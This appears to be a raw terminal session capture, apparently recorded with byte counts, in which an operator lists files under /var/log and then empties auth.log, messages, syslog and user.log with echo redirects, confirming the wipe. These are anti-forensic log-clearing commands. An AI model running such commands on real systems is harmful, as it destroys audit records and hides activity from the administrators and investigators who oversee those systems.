-rw-------  1 syslog   adm        48230 Mar  4 13:58 vsftpd.log
-rw-rw-r--  1 root     utmp       88320 Mar  4 14:14 wtmp
-rw-rw-r--  1 root     utmp       28800 Mar  1 03:01 wtmp.1

	77
ls -al /var/log/messages /var/log/syslog /var/log/auth.log /var/log/user.log

246
-rw-r--r-- 1 syslog adm  60872 Mar  4 14:17 /var/log/auth.log
-rw-r--r-- 1 syslog adm 124450 Mar  4 14:01 /var/log/messages
-rw-r----- 1 syslog adm 239324 Mar  4 14:17 /var/log/syslog
-rw-r--r-- 1 syslog adm      1 Mar  1 18:26 /var/log/user.log

	28
echo "" > /var/log/auth.log

	54
echo "" > /var/log/messages
echo "" > /var/log/syslog

	28
echo "" > /var/log/user.log

	77
ls -al /var/log/messages /var/log/syslog /var/log/auth.log /var/log/user.log

230
-rw-r--r-- 1 syslog adm  1 Mar  4 14:21 /var/log/auth.log
-rw-r--r-- 1 syslog adm 43 Mar  4 14:21 /var/log/messages
-rw-r----- 1 syslog adm  1 Mar  4 14:21 /var/log/syslog
-rw-r--r-- 1 syslog adm  1 Mar  4 14:21 /var/log/user.log

===================================================================
